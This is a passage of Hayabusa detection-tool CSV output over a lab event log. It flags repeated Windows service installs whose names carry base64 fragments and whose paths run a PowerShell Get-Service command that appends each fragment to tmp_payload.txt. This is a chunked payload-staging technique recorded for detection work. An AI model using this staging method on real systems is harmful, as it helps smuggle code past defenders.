start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:39.555 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:41.021 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:41.021 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:41.021 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:42.474 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:42.474 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:42.474 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:43.938 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:43.938 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:43.938 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:45.441 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:45.441 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:45.441 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:46.913 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:46.913 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:46.913 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:48.360 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:48.360 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:48.360 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:49.806 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:49.806 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:49.806 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:51.269 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:51.269 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:51.269 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:52.716 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:52.716 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:52.716 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:54.170 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:54.170 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:54.170 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:55.604 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:55.604 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:55.604 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:57.053 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:57.053 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:57.053 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
